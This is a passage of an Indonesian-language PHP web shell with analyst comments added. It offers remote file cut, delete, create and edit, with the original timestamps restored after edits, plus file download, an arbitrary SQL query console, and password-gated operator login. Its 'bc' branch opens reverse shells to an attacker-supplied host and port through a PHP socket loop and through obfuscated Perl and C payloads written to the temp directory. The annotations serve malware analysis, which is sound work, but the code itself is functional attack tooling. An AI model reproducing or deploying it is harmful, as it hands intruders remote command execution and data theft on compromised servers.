$hasils[] = "Cut file berhasil!";
} else {
$hasils[] = "Cut file gagal!";
}
}
} else if($item['type'] === 'dir'){
$isCopyD = gandakanDir($sourcePath, $targetPath);
if($isCopyD){
xrmdir($sourcePath);
$hasils[] = "Cut dir berhasil!";
} else {
$hasils[] = "Cut dir gagal!";
}
}
}
$outs = implode(', ', array_unique($hasils));
echo $outs;
die();
} else if($_GET['act'] == 'mass_del'){
$path = rtrim($_POST['xpath'], '/');
$xdata = json_decode(base64_decode($_POST['xdata']),true);
$hasils = false;
foreach ($xdata as $ki => $item){
if($item['type'] == 'dir'){
xrmdir($path.'/'.$item['name']);
$hasils = true;
} else {
unlink($path.'/'.$item['name']);
$hasils = true;
}
}
echo $hasils == true ? 'File deteled!' : 'Gagal menghapus file';
die();
} else if($_GET['act'] == 'sql'){
if($_GET['q'] == 'check'){
if(AvFunc(array('mysql_get_client_info', 'mysqli_get_client_info'))){$temp[] = "MySQL";}
if(AvFunc(array('mssql_connect'))){$temp[] = "MSSQL";}
if(AvFunc(array('pg_connect'))){$temp[] = "PostgreSQL";}
if(AvFunc(array('oci_connect'))){$temp[] = "Oracle";}
if(AvFunc(array('odbc_connect'))){$temp[] = "odbc";}
if(AvFunc(array('sqlite_open'))){$temp[] = "SQLite";}
if(class_exists('SQLite3')){$temp[] = "SQLite3";}
if(class_exists('PDO')){$temp[] = "PDO";}
if(isset($temp) && count($temp) > 0){
foreach($temp as $kt){
$dtx[] = $kt;
}
}
$outs = isset($dtx) ? array('error' => 0, 'data' => $dtx) : array('error' => 1, 'message' => 'No database installed in this server');
header("Content-type: application/json; charset=utf-8");
echo json_encode($outs);
die();
} else if($_GET['q'] == 'connect'){
if(isset($_POST)){
$sqltype = $_POST['sqltype'];
$sqlhost = $_POST['sqlhost'];
$sqluser = $_POST['sqluser'];
$sqlpass = isset($_POST['sqlpass']) && !empty($_POST['sqlpass']) ? $_POST['sqlpass'] : null;
$sqldata = isset($_POST['sqldata']) && !empty($_POST['sqldata']) ? $_POST['sqldata'] : null;
switch($sqltype){
case 'MySQL' : $contype = 'mysql'; $showdb = "SHOW DATABASES"; break;
case 'PostgreSQL': $contype = 'pgsql'; $showdb = "SELECT schema_name FROM information_schema.schemata"; break;
case 'SQLite3' :
case 'SQLite' : $contype = 'sqlite'; $showdb = "SELECT \"{$s_sql['host']}\""; break;
case 'MSSql' : $contype = 'mssql'; $showdb = "SELECT name FROM master..sysdatabases"; break;
case 'Oracle' : $contype = 'oracle'; $showdb = "SELECT USERNAME FROM SYS.ALL_USERS ORDER BY USERNAME"; break;
case 'PDO' : $contype = 'pdo'; $showdb = "SHOW DATABASES"; break;
case 'odbc' : $contype = 'odbc'; $showdb = "SHOW DATABASES"; break;
default : $contype = 'mysql'; $showdb = "SHOW DATABASES";
}
try {
$db = new DatabaseManager($contype, $sqlhost, $sqluser, $sqlpass, $sqldata);
$result = $db->query($showdb);
while ($row = $db->fetchRow($result)){
$dblists[] = "";
}
$dtTable = "
";
echo $dtTable;
} catch (Exception $e) {
echo $e->getMessage();
}
$db->close();
}
} else {
if(isset($_POST)){
$sqlconnect = json_decode(base64_decode($_POST['sqlconnect']),true);
$sqlgetdata = isset($_POST['sqlgetdata']) && !empty($_POST['sqlgetdata']) ? $_POST['sqlgetdata'] : '';
$sqlquery = isset($_POST['sqlquery']) && !empty($_POST['sqlquery']) ? $_POST['sqlquery'] : '';
$slimit = isset($_POST['slimit']) && !empty(preg_replace('/[^0-9]/','',$_POST['slimit'])) ? preg_replace('/[^0-9]/','',$_POST['slimit']) : 0;
$elimit = isset($_POST['elimit']) && !empty(preg_replace('/[^0-9]/','',$_POST['elimit'])) ? preg_replace('/[^0-9]/','',$_POST['elimit']) : 25;
switch($sqlconnect[0]){
case 'MySQL' : $contype = 'mysql'; break;
case 'PostgreSQL': $contype = 'pgsql'; break;
case 'SQLite' : case 'SQLite3' : $contype = 'sqlite'; break;
case 'MSSql' : $contype = 'mssql'; break;
case 'Oracle' : $contype = 'oracle'; break;
case 'PDO' : $contype = 'pdo'; break;
case 'odbc' : $contype = 'odbc'; break;
default : $contype = 'mysql';
}
$hasils = [];
$db = new DatabaseManager($contype, $sqlconnect[1], $sqlconnect[2], ($sqlconnect[3]!=null?$sqlconnect[3]:''), $sqlconnect[4]);
try {
if(trim($sqlquery) || trim($sqlgetdata)){
if(trim($sqlgetdata) != '' && (trim($sqlquery) == '' || trim($sqlquery) != '')){
switch($contype){
case 'mysql' : $showrows = "SELECT * FROM `{$sqlgetdata}` LIMIT {$slimit},{$elimit};"; break;
case 'pgsql' : $showrows = "SELECT * FROM {$sqlgetdata} LIMIT {$elimit} OFFSET {$slimit};"; break;
case 'sqlite' : $showrows = "SELECT * FROM {$sqlgetdata} LIMIT {$slimit},{$elimit};"; break;
case 'mssql' : $showrows = "SELECT TOP {$elimit} * FROM {$sqlgetdata};"; break;
case 'oracle' : $showrows = "SELECT * FROM {$sqlgetdata} WHERE ROWNUM BETWEEN {$slimit} AND {$elimit};"; break;
case 'pdo' :
$pdoDriver = $db->getConnection()->getAttribute(PDO::ATTR_DRIVER_NAME);
switch ($pdoDriver) {
case 'mysql' : $showrows = "SELECT * FROM `{$sqlgetdata}` LIMIT {$slimit},{$elimit};"; break;
case 'pgsql' : $showrows = "SELECT * FROM {$sqlgetdata} LIMIT {$elimit} OFFSET {$slimit};"; break;
case 'sqlite' : $showrows = "SELECT * FROM {$sqlgetdata} LIMIT {$slimit},{$elimit};"; break;
case 'sqlsrv' : $showrows = "SELECT TOP {$elimit} * FROM {$sqlgetdata};"; break;
case 'oci' : $showrows = "SELECT * FROM {$sqlgetdata} WHERE ROWNUM BETWEEN {$slimit} AND {$elimit};"; break;
default : throw new Exception("Unsupported PDO driver: {$pdoDriver}");
}
break;
case 'odbc' : $showrows = "SELECT * FROM `{$sqlgetdata}` LIMIT {$slimit},{$elimit};"; break;
default : $showrows = "SELECT * FROM `{$sqlgetdata}` LIMIT {$slimit},{$elimit};";
}
} else if(trim($sqlquery) != '' && (trim($sqlgetdata) == '' || trim($sqlgetdata) != '')){
$showrows = $sqlquery;
}
$resrows = $db->query($showrows);
if($resrows){
if(!is_bool($resrows)){
if($db->numRows($resrows) > 0){
while ($row = $db->fetchRow($resrows)){
$hasils[] = $row;
}
} else {
$fieldInfo = $db->getFieldInfo($resrows);
$hasils[] = array_fill_keys($fieldInfo['field_names'], '-');;
}
} else {
$hasils[] = ["query" => "Affected Rows: " . $db->affectedRows($showrows)];
}
}
} else {
switch($contype){
case 'mysql' : $showtbl = "SHOW TABLES FROM `{$sqlconnect[4]}`"; break;
case 'pgsql' : $showtbl = "SELECT table_name FROM information_schema.tables WHERE table_schema='{$sqlconnect[4]}'"; break;
case 'sqlite' : $showtbl = "SELECT name FROM sqlite_master WHERE type='table'"; break;
case 'mssql' : $showtbl = "SELECT name FROM {$sqlconnect[4]}.sysobjects WHERE xtype = 'U'"; break;
case 'oracle' : $showtbl = "SELECT TABLE_NAME FROM SYS.ALL_TABLES WHERE OWNER='{$sqlconnect[4]}'"; break;
case 'pdo' :
$driver = $db->getConnection()->getAttribute(PDO::ATTR_DRIVER_NAME);
switch ($driver) {
case 'mysql' : $showtbl = "SHOW TABLES FROM `{$sqlconnect[4]}`"; break;
case 'pgsql' : $showtbl = "SELECT table_name FROM information_schema.tables WHERE table_schema = '{$sqlconnect[4]}'"; break;
case 'sqlite' : $showtbl = "SELECT name FROM sqlite_master WHERE type='table'"; break;
case 'sqlsrv' : $showtbl = "SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES"; break;
case 'oci' : $showtbl = "SELECT TABLE_NAME FROM SYS.ALL_TABLES"; break;
default : throw new Exception("Unsupported PDO driver: {$driver}");
}
break;
case 'odbc' : $showtbl = "SHOW TABLES"; break;
default : $showtbl = "SHOW TABLES FROM `{$sqlconnect[4]}`";
}
$result = $db->query($showtbl);
if($result && $result->num_rows > 0){
while ($row = $db->fetchRow($result)){
foreach($row as $s_tables){
$hasils[$s_tables][] = $s_tables;
}
}
}
}
echo json_encode($hasils);
} catch (Exception $e) {
echo $e->getMessage();
}
$db->close();
}
}
die();
} else if($_GET['act'] == 'bc'){
$outs = '';
if(isset($_POST['xpath'], $_POST['bhost'], $_POST['bport'], $_POST['btype'])){
/**
 * Analyst note: helper that looks up an executable by handing the string
 * 'which <name>' to perintahnya(), which appears to be this script's
 * command runner (defined outside this chunk).
 *
 * The function is declared inside the 'bc' request branch, so it only
 * exists after that branch has executed.
 *
 * @param $p    Program name; appended to the command string as-is.
 * @param $path Passed through as the second argument of perintahnya()
 *              (presumably the working directory; confirm against its definition).
 * @return The 'stdout' entry of the result when it is non-empty, otherwise false.
 */
function which($p,$path){
$d = perintahnya('which ' . $p, $path);
if(!empty($d['stdout'])){return $d['stdout'];}
return false;
}
if($_POST['btype'] == 1){
// Analyst note (btype 1): connect-back channel built from PHP stream functions only.
// The web-server process opens an outbound TCP connection to the host and port
// given in the POST body (bhost, bport).
// Network indicator: a PHP worker initiating a connection to an arbitrary
// external address instead of only answering inbound HTTP.
if(AvFunc(array('fsockopen','fputs','feof','fgets','fclose'))){
$sockfd = @fsockopen($_POST['bhost'], $_POST['bport'], $errno, $errstr);
$out = "";
if($errno != 0) {
$out .= "{$errno} : {$errstr}";
} else if (!$sockfd) {
$out .= "Unexpected error has occured, connection may have failed.";
} else {
// The banner and prompt written to the peer are fixed literals, usable as
// content signatures on captured traffic.
fputs($sockfd, "yoshh.. Connected!\n");
// Runs until the peer closes the socket; the HTTP request that triggered
// this branch does not return before the loop ends.
while(!feof($sockfd)) {
$cmdPrompt = '[$]~ ';
fputs($sockfd, $cmdPrompt);
// Each line received from the peer is passed to perintahnya() together with
// xpath, and the 'stdout' entry of the result is written back to the socket.
$command = fgets($sockfd, $GLOBALS['chunk_size']);
fputs($sockfd, "".perintahnya($command, $_POST['xpath'])['stdout']."");
}
$out .= $sockfd;
fclose($sockfd);
}
$outs .= $out;
} else {
$outs = 'reverse shell using php: failed!';
}
} else if($_POST['btype'] == 2){
$tmpdir = str_replace('\\','/', @sys_get_temp_dir());
if(is_writable($tmpdir)){
$bcfile = $tmpdir."/bc.pl";
$cf = cf($bcfile, generate("decode", "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"));
if($cf){
if(which('perl')){
$out = perintahnya("perl {$bcfile} {$_POST['bhost']} {$_POST['bport']} &", $tmpdir);
$outs = $out['stdout']."\n".perintahnya("".generate("decode", "w5s4b234t4r4f296c274i4k5h4p32494n2l4t5")."", $tmpdir)['stdout'];
} else {
$outs = 'reverse shell using perl: failed!';
}
} else {
$outs = 'reverse shell using perl: failed!';
}
} else {
$outs = 'temp directory is not writeable!';
}
} else if($_POST['btype'] == 3){
$tmpdir = str_replace('\\','/', @sys_get_temp_dir());
if(is_writable($tmpdir)){
$bcfile = $tmpdir."/bc.c";
$cf = cf($bcfile, generate("decode", "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"));
if($cf){
if(which('gcc')){
$out = perintahnya("".generate("decode", "n5c464a2t2i4f244o4d4g42434k582t2l4i4x5u2j594r274")."", $tmpdir);
@unlink($bcfile);
$out = perintahnya("{$bcfile} {$_POST['bhost']} {$_POST['bport']} &", $tmpdir);
$outs = perintahnya("".generate("decode", "w5s4b234t4r4f296c274i4k5h4p32494")."", $tmpdir)['stdout'];
} else {
$outs = 'reverse shell using C: failed!';
}
} else {
$outs = 'reverse shell using C: failed!';
}
} else {
$outs = 'temp directory is not writeable!';
}
} else {
$outs = 'method gak tersedia!';
}
} else {
$outs = 'gak bisa di konekin!';
}
echo $outs;
die();
} else if($_GET['act'] == 'path'){
$_SESSION['path'] = isset($_GET['dir']) && !empty($_GET['dir']) ? $_GET['dir'] : $_SESSION['path'];
if(isset($_GET['opt'], $_GET['entry'])){
$df = $_SESSION['path'] .'/'. $_GET['entry'];
if($_GET['opt'] == 'newfile'){
$xdata = isset($_POST['xdata']) ? base64_decode($_POST['xdata']) : '';
if(AvFunc(array('fopen','fwrite','fclose'))){
$fp = @fopen($df, 'w');
if($fp){
@fwrite($fp, $xdata);
@fclose($fp);
$dout = "{$_GET['entry']} berhasil dibuat!";
} else {
$dout = "{$_GET['entry']} gagal dibuat!";
}
} else if(AvFunc(array('file_put_contents'))){
file_put_contents($df, $xdata);
$outs = file_exists($df) ? "{$_GET['entry']} berhasil dibuat!" : "{$_GET['entry']} gagal dibuat!";
} else {
$outs = "{$_GET['entry']} gagal dibuat!";
}
} else if($_GET['opt'] == 'edit'){
if(isset($_POST['xdata'])){
$_POST['xdata'] = base64_decode($_POST['xdata']);
$time = @filemtime($df);
if(AvFunc(array('fopen','fwrite','fclose'))){
$fp = @fopen($df, 'w');
if($fp){
@fwrite($fp, $_POST['xdata']);
@fclose($fp);
@touch($df, $time, $time);
$dout = "{$_GET['entry']} berhasil di-edit!";
} else {
$dout = "{$_GET['entry']} gagal di-edit!";
}
} else if(AvFunc(array('file_put_contents'))){
file_put_contents($df, $_POST['xdata']);
@touch($df, $time, $time);
$dout = file_exists($df) ? "{$_GET['entry']} berhasil di-edit!" : "{$_GET['entry']} gagal di-edit!";
} else {
$dout = "{$_GET['entry']} tidak dapat di-edit!";
}
} else {
if(!is_writable($df)){
$dout = "Disini gk bisa edit file/direktori!";
} else {
if(AvFunc(array('fopen','fread','fclose'))){
$filesize = @filesize($df);
$fp = @fopen($df, 'r');
if($fp){
$dout = "";
while(!@feof($fp)){$dout .= htmlspecialchars(@fread($fp, $filesize>0?$filesize:8192));}
@fclose($fp);
}
} else{
$dout = "Gagal edit {$_GET['entry']}!";
}
}
}
} else if($_GET['opt'] == 'download'){
if(isset($_GET['dir'], $_GET['entry'])){
$df = $_GET['dir'] .'/'. $_GET['entry'];
if(@is_file($df) && @is_readable($df)){
header('Pragma: public');
header('Expires: 0');
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Content-Type: application/force-download');
header('Content-Type: application/download');
header('Content-Type: '.(function_exists('mime_content_type') ? @mime_content_type($df) : 'application/octet-stream'));
header('Content-Description: File Transfer');
header('Content-Disposition: attachment; filename='.basename($df));
header('Content-Length: '.@filesize($df));
header('Content-Transfer-Encoding: binary');
$fp = @fopen($df, 'r');
if($fp){
while(!@feof($fp)) echo @fread($fp, @filesize($df));
fclose($fp);
}
exit();
} else {
echo "File tidak dapat di download!'"; exit();
}
} else {
echo "Tidak ada file yang dipilih!"; exit();
}
} else {
$dout = '';
if(@filesize($df)>0){
if(AvFunc(array('fopen','fread','fclose'))){
$fp = @fopen($df, 'r');
if($fp){
while(!@feof($fp)){$dout .= htmlspecialchars(@fread($fp, @filesize($df)));}
@fclose($fp);
}
} else if(AvFunc(array('file_get_contents'))){
$dout .= @file_get_contents($df);
} else {
$dout .= "{$_GET['entry']} ini gak bisa dibaca!";
}
} else {
if(AvFunc(array('file_get_contents'))){
$dout .= @file_get_contents($df);
}
}
}
echo $dout;
} else {
echo base64_encode(FManager($_SESSION['path']));
}
die();
} else if($_GET['act'] == 'logout'){
unset($_SESSION['auth'], $_SESSION['path']);
header('location: '.$_SERVER['PHP_SELF']);
exit();
}
}
// Analyst note: operator login for the web shell.
// blockCrawler() is defined outside this chunk; judging by its name it filters
// crawler/bot requests. Confirm against its definition.
blockCrawler();
// The password arrives in the POST field 'xpass' and is checked with
// password_verify() against the hash held in $auth_pass (set outside this chunk).
if(isset($_POST['xpass'])){
if(password_verify($_POST['xpass'], $auth_pass)){
// On success the stored hash itself becomes the session's auth marker and the
// file-manager start path is taken from $lokasiberkas.
$_SESSION['auth'] = $auth_pass;
$_SESSION['path'] = $lokasiberkas;
// Redirect back to the same script.
// Log indicator: a POST carrying 'xpass' answered with a Location header that
// points at the script's own path.
header('location: '.$_SERVER['PHP_SELF']);
exit();
} else {
$statusLogin[] = 'wrong password :(';
}
}
if(!isset($_SESSION['auth'])){
echo "
Restricted area
";
die();
} else {
?>